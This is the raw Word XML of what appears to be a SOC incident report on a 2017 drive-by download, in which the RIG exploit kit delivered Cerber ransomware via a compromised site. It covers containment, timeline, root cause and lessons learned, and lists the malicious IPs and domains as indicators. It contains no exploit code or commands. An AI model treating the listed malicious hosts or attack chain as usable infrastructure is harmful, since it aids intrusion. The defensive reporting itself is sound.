    <w:p w14:paraId="538D2BEA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B9E774F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57A29EED">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24F0CB53">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6DD6A495">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46AE4EDE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32306351">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2793FD74">
      <w:pPr>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2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F70F05F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3CF7774A">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1. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>Incident Summary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56FED3C8">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On January 27, 2017, an incident was triggered by a user who inadvertently accessed a compromised webpage while searching for "home improvement remodeling your kitchen." This user-initiated event led to a drive-by download attack that was executed using an Exploit Kit (EK). The attacker exploited vulnerabilities in the user's browser to silently redirect them from a legitimate website, homeimprovement.com, to a malicious domain ty.benme.com, controlled by the attacker. This redirection resulted in the download of malicious files, including Cerber ransomware.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3089DC42">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The incident was first identified when the Snort Network Intrusion Detection System (NIDS) detected suspicious activity originating from the user's system. The attacker's goal was not to steal data, but rather to infect the system with ransomware and encrypt its contents for monetary gain. However, due to the rapid detection and response by the SOC team, the incident was contained before significant damage could occur.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B123DFE">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2. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>Containment and Eradication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65E11A01">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Containment Actions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07AF8550">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The Security Onion's NIDS alerted the Security Operations Center (SOC) team to the suspicious activity, particularly focusing on the traffic between the source IP 172.16.4.193 (the user's system) and the malicious IP 194.87.234.129.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="739A0595">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Immediate actions were taken to isolate the affected system from the network to prevent further compromise and infection of other networked systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76D515D1">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Connections from the compromised system to external malicious IP addresses were blocked at the firewall level, specifically targeting the traffic to 194.87.234.129 and other associated malicious domains.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5839FE52">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Affected endpoints were flagged, and logs were thoroughly analyzed to trace the scope of the infection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43DE6429">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Eradication Actions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45B5409A">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SOC analysts used Sguil, Wireshark, and Kibana to investigate the extent of the compromise, identifying the systems, URLs, and IP addresses involved in the attack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="557C2744">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Affected hosts were thoroughly scanned using endpoint security tools to detect and remove any traces of malware</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:rtl/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="461522F3">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48C6CD55">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="16FB34F2">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All malicious files and malware signatures were cataloged, and systems were cleaned using anti-malware tools. Additionally, all vulnerable software components were patched to close any known vulnerabilities that could be exploited by the attacker.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F1AE6E3">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Logs were reviewed to identify any indicators of compromise (IoCs) and validate that no other systems were affected.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16185DB2">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3. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>Timeline of Event</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B868371">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**January 27, 2017**</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="426D3196">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- 22:54:43 – The first Snort NIDS alert was triggered, detecting suspicious HTTP traffic originating from the user's machine (source IP 172.16.4.193) to a known malicious IP 194.87.234.129 on port 80.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72140F6C">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- 22:54:45 – The user's system sent an HTTP request to ty.benme.com, which initiated the download of malicious content, specifically a compressed gzip file. This file was later identified as part of the Cerber ransomware.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06A08A77">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- 22:55:00 – A series of additional HTTP requests were made to other malicious websites, including p27dokhpz2n7nvgr.1jw2lx.top and spotsbill.com, indicating that the user had been fully redirected into a malicious infection chain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B6F49AC">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**January 28, 2017:**</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B131642">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- 00:00 – Incident containment measures were initiated, with the SOC team isolating compromised hosts from the network to prevent further spread of the infection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6823F6BC">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4. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>Recovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46BD893A">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**Restoration of Systems**</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7046445E">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All systems that were found to have connected to the malicious URLs were taken offline and re-imaged to ensure complete removal of the malware. This was deemed necessary as even thorough malware removal might leave remnants or backdoors, which could be exploited later.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B0C13E2">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Network traffic logs and pcap files were meticulously reviewed to confirm that the malware had not spread further within the network and that no additional systems were compromised.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7371553B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6AE07534">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71044191">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C99D19E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="431D93ED">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**Data Recovery**</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60C0BC18">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Fortunately, no data exfiltration occurred during this incident, as the primary goal of the attacker was to encrypt files using ransomware, rather than steal data. As a result, data recovery efforts were minimal.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09C45F40">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="692F8E36">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Even though no data was compromised, verified backups of critical systems were reviewed and tested as part of standard recovery procedures, ensuring that the organization was prepared for worst-case scenarios in the future.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="606F9C5C">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5. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>Impact</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34CE6118">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**Financial Impact**</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C6FB03B">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The financial losses were relatively minimal due to the quick and efficient containment of the incident. The only losses incurred were the costs associated with downtime from re-imaging systems, labor costs for investigation and recovery, and minor productivity losses while affected systems were offline.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13C8B176">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**Data Breach**</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="154CB03F">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No sensitive data was exfiltrated during this incident. The attacker’s primary goal was to infect systems with Cerber ransomware, which encrypts files and demands a ransom for decryption. Fortunately, the infection was identified early enough to prevent the ransomware from fully executing its payload.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A121317">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**Reputation**</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="627327A7">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Although the incident was contained before any significant damage could occur, there was a slight reputational impact on the company. Users who visited the legitimate website, **homeimprovement.com**, and were redirected to malicious sites may have been exposed to the drive-by download attack. The company received several inquiries from concerned users, requiring communication from the public relations team to reassure customers and mitigate the situation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76C52AC0">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6. **</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>Root Cause Analysis</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>**</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D54FC44">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A90C3EA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D0080E6">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3287FF3B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0505F5F9">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**Underlying Cause**</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50BA0C6D">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The root cause of the incident was the compromise of the legitimate website homeimprovement.com. The website had been unknowingly compromised by attackers, who injected malicious code into its HTML. This code, an iframe containing a hidden link to ty.benme.com, redirected visitors to a malicious domain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A593C97">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The redirection was a critical part of a larger drive-by attack that exploited vulnerabilities in the user's browser and web plugins.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C76608B">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**Exploited Vulnerabilities**</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17991415">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43A6A7D5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74629FB7">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The RIG Exploit Kit was used to take advantage of multiple vulnerabilities in the user's web browsing software, particularly in outdated browser plugins and extensions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B8C9E80">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A45C32E">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The EK delivered a malicious compressed file (in gzip format), which contained Cerber ransomware. Once the file was downloaded and executed, the system would have been encrypted had the incident not been detected and contained quickly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="301F1E4C">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7. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>Lessons Learned.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34DA2566">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**Key Takeaways**</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FD98117">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Regular vulnerability scanning: Ensuring that legitimate websites are regularly scanned for vulnerabilities can help detect and patch potential weak points that attackers may use for drive-by attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="463A0A53">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Enhanced monitoring: Outbound connections to suspicious or unknown domains should be closely monitored. Automated systems should alert the SOC team of any unusual traffic patterns that may indicate a redirection to a malicious site.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26E4642E">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User awareness and education: Many drive-by download attacks exploit user trust in legitimate websites. Increased user training on recognizing suspicious behavior (e.g., unexpected pop-ups, redirections) can help prevent users from inadvertently falling victim to such attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0048A799">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32F27304">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13A14911">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20C8727F">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8. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>Summary Report</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="728E6E7D">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This incident, which was detected by nort NIDS, involved a malware exploit targeting users of the legitimate website homeimprovement.com. Visitors to the site were silently redirected to a malicious domain where the RIG Exploit Kit was deployed, exploiting vulnerabilities in the user's browser and downloading Cerber ransomware.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D31B030">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The SOC team employed Kibana, Sguil, and Wireshark to investigate and contain the incident. Through their analysis, the team identified the compromised hosts, malicious domains, and the malware involved in the attack. The security response was part of a larger campaign that involved the use of exploit kits like RIG to target unsuspecting users and infect their systems with ransomware.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BB14C99">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45394524">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This report was shared with senior management and IT teams, providing a detailed analysis of the attack, the actions taken to mitigate the impact, and recommendations for future prevention measures.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58EBB821">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9. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>Review and Improv</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6603ADB7">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**Action Points for Improvement**</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="362C3C9E">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Stricter monitoring: Implement automated alerts and stricter controls on outbound traffic to new or suspicious domains. This will help detect malicious redirections early and prevent users from accessing malicious websites.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A1E4BE5">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Incident response drills: Conduct regular incident response drills to improve coordination between SOC teams and IT departments. These drills should include scenarios involving exploit kits, drive-by download attacks, and ransomware.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57526981">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Web filtering: Enhance web filtering capabilities to block access to known malicious sites. Ensure that filters are updated regularly to include the latest threat intelligence feeds.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B215C57">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User training: Improve user training on recognizing phishing attacks, malicious redirects, and unsafe browsing habits. Empower users to report suspicious behavior or incidents quickly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47A82664">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2CC31A52">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43A095BF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73FBABB0">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
